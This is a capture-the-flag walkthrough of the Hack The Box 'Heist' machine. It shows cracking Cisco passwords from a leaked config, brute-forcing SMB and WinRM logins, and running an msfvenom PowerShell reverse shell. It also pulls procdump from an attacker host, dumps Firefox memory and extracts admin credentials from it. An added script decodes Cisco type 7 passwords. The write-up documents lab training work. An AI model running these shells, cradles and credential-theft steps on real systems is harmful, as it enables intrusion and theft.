WriteUp: Intro to Dante – Heist 2/6

In this post we will talk about the Heist, the second challenge for the HTB Track “Intro to Dante”.

HTB Heist banner

TL;DR

The attack kill chain can be mapped to the following steps:

  • Recon and enumeration (HTTP and SMB/MSRPC services)
  • Broken authentication at the HTTP service by abusing the "Login as Guest" functionality
  • Sensitive file with hashed passwords attached to a thread in the Issues dashboard
  • Cracking the Cisco passwords and compromising the hazard user by brute force
  • Abusing hazard privileges to enumerate users over SMB/MSRPC
  • Compromise of the Chase user by brute force
  • Command execution by spawning an Evil-WinRM shell with Chase privileges
  • Compromise of the Admin credentials from data inside a Firefox process dump

Reconnaissance and Enumeration

During the reconnaissance with nmap, the attacker identified the open ports 80/TCP, 135/TCP and 445/TCP.

Nmap Results

Web Services – 80/TCP

Accessing the HTTP service on port 80/TCP, the attacker is able to authenticate as a Guest user.

Feature “Login as Guest” enabled in the application

When the attacker uses the "Login as Guest" feature, the application redirects to an internal service desk ticket dashboard, exposing internal communications. The main thread has a log file attached containing the command line history for the problem described in the open issue.

Access to Issues dashboard

Accessing the log file available at the URL "http://10.10.10.149/attachments/config.txt" reveals two type 7 Cisco passwords and one type 5 Cisco password.

Hashed Passwords and Usernames inside the config.txt file

Crypto Attacks – Decrypting the hashed passwords

To crack the passwords, the attacker used the online service located at URL:

Decrypting the Cisco passwords (type 7 values are reversible obfuscation, type 5 is a salted MD5 hash)
  • username rout3r password 7 0242114B0E143F015F5D1E161713
    • Cracked password: $uperP@ssword
  • username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
    • Cracked password: Q4)sJu\Y8qz*A3?d
  • enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
    • Cracked password: stealth1agent
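As an added example (not part of the original write-up), a small Python audit that flags the weak credential types in an IOS config and, for type 7, decodes the value to show why it gives no protection once the config leaks into a ticket attachment. The sample config is constructed from the three lines quoted above; the type 9 line and its hash value are placeholders.

```python
import re
from typing import Dict, List

# Public XOR key used by Cisco IOS "type 7" obfuscation; it is not a secret, so
# type 7 strings can be turned back into plaintext by anyone holding the config.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

def decode_type7(encoded: str) -> str:
    """First two decimal digits are the key offset; the rest is hex, one byte per char."""
    offset = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    return bytes(b ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)]
                 for i, b in enumerate(data)).decode()

# Matches "username X [privilege N] password|secret T VALUE" and "enable secret T VALUE"
CRED_RE = re.compile(r"^(?:username (?P<user>\S+)(?: privilege \d+)? (?:password|secret)"
                     r"|enable secret)\s+(?P<type>\d)\s+(?P<value>\S+)")

ADVICE = {
    "0": ("critical", "stored in cleartext"),
    "7": ("critical", "type 7 is reversible XOR, not encryption"),
    "5": ("high", "type 5 is salted MD5 and cracks quickly offline"),
}

def audit_config(config: str) -> List[Dict[str, str]]:
    """Return one finding per weak credential line; types 8/9 (PBKDF2/scrypt) pass."""
    findings = []
    for raw in config.splitlines():
        m = CRED_RE.match(raw.strip())
        if not m or m.group("type") not in ADVICE:
            continue
        severity, reason = ADVICE[m.group("type")]
        finding = {"user": m.group("user") or "enable", "type": m.group("type"),
                   "severity": severity, "reason": reason,
                   "fix": "re-enter with 'algorithm-type scrypt secret ...' (type 9)"}
        if m.group("type") == "7":
            finding["plaintext"] = decode_type7(m.group("value"))  # proves the point
        findings.append(finding)
    return findings

# Constructed sample: the three credential lines quoted above plus one type 9 line
# (its hash value is a placeholder, not a real scrypt string)
SAMPLE_CONFIG = """\
service password-encryption
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username ops secret 9 $9$PLACEHOLDER_SCRYPT_HASH
"""

if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print(f"[{f['severity']}] {f['user']}: type {f['type']} - {f['reason']}")
```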

SMB Enumeration – Hazard User

After the attacker performs a brute force attack with the cracked passwords against the users enumerated from the Issues page and the config.txt file, one valid credential is obtained, allowing access to the SMB service with hazard privileges.

smbmap -u hazard -p 'stealth1agent' -H 10.10.10.149
Confirming the credentials for user hazard using SMBMAP

Enumerating usernames

To enumerate valid usernames, the attacker abused the SMB/MSRPC services in the context of hazard privileges with the impacket-lookupsid tool.

impacket-lookupsid hazard:stealth1agent@10.10.10.149
Impacket-Lookupsid Output reveals valid users based on SID enumeration
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

BruteForcing Users

To identify new valid credentials, the attacker performs a brute force attack using the previously cracked passwords and the freshly enumerated user list.

Two files were prepared for the procedure: one with the usernames, one per line, and one with the passwords in the same format.

To perform the attack, CrackMapExec with the WinRM module was used.

crackmapexec winrm  -u users-clean.list -p passwords -d 'SUPPORTDESK' 10.10.10.149  --continue-on-success
CrackMapExec identified domain user SUPPORTDESK\Chase

As a result, the domain user SUPPORTDESK\Chase has been compromised.

Initial Compromise – Command Execution: SUPPORTDESK\CHASE privileges

To obtain a shell on the target server, the attacker uses Evil-WinRM to spawn a shell as the domain user SUPPORTDESK\Chase.

sudo evil-winrm -i heist.htb -u 'Chase'   -p 'Q4)sJu\Y8qz*A3?d'
Executing evil-winrm with Chase credentials

Compromising User flag

The user.txt flag is located at C:\Users\Chase\Desktop\user.txt and can be accessed through the Evil-WinRM shell running with SUPPORTDESK\Chase privileges.

Flag user.txt

Privilege Escalation – Hunting for Administrator

To obtain more functionality, the attacker uses the Metasploit Framework and sets up a multi/handler with the payload set to windows/powershell_reverse_tcp.

Metasploit multi handler configurations

To execute the reverse shell, the attacker uses the msfvenom utility to generate a PowerShell payload and then runs it inside the WinRM shell spawned earlier.

sudo msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.4 LPORT=443 -f raw

The output from msfvenom was copied and pasted into the WinRM shell and executed.

powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
Executing the payload windows/x64/powershell_reverse_tcp inside the WinRM shell

To obtain Meterpreter functionality, the attacker used the post/multi/manage/shell_to_meterpreter module from the Metasploit Framework against the previously spawned reverse shell.

Under Chase privileges, the attacker was able to identify a running Firefox process with process listing commands. In this scenario, the attacker dumped the memory of the Firefox process using procdump64.exe from Sysinternals.

Procdump was downloaded to the attacker machine and delivered to the target using a PowerShell download cradle.

iwr -UseBasicParsing -Uri http://atackker/processdump64.exe -Outfile processdump64.exe
Attacker's HTTP server receiving the connection from the PowerShell download cradle executed on the target machine

To obtain the PID of the Firefox process, the attacker used the ps command inside the previously spawned PowerShell interpreter.

Identifying the firefox PID

Knowing the Firefox PID, the attacker is able to run procdump64 to perform a full process memory dump.

.\procdump64.exe -accepteula -ma 6156
procdump64.exe dump types from the help option
Performing the process dump against the Firefox PID (6156)
Confirming success by listing the directory and checking that the dump file exists

To work on the dump file, the attacker uses the Meterpreter shell obtained earlier to download the file from the target to the attacker machine.

Exfiltrating the Dump file to attacker machine

To extract data from the Firefox process dump, the attacker used the Linux strings command and filtered the output with grep for sensitive keywords such as admin.

The search reveals the admin credentials inside an HTTP GET request, passed in the login_password query parameter (which is why the plaintext remains sitting in the browser's memory).

Admin Credentials extracted from Firefox Process Dump File
\;C:\Users\Administrator\AppData\Local\Microsoft\WindowsApps;;C:\Users\Chase\AppData\Local\Microsoft\WindowsApps
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
  • admin@support.htb 4dD!5}x/re8]FBuZ

Compromising Root flag

With the admin credentials, the attacker spawned a shell using evil-winrm as before, this time as the user Administrator. Inside the shell, the attacker found the root.txt flag at C:\Users\Administrator\Documents\root.txt and read it using the Get-Content cmdlet.

Compromising the root flag

Considerations

The password cracking has been done by using online services with some kind of rainbow tables I think, but it could be done using local dictionary attacks with hashcat or John The Ripper too.

At the point of obtaining the admin credentials from the Firefox process I think there's another solution by starting a traffic sniffing technique, but during that time I was not able to use the meterpreter sniffer modules for some unknown reason (a nonsense error from meterpreter). I didn't try any other method to perform traffic sniffing, so I will leave this point open.

The box is fun and makes for a progressive exploitation; the privilege escalation to admin by abusing the Firefox process reminds me to play more with process dumping to get low hanging fruits.
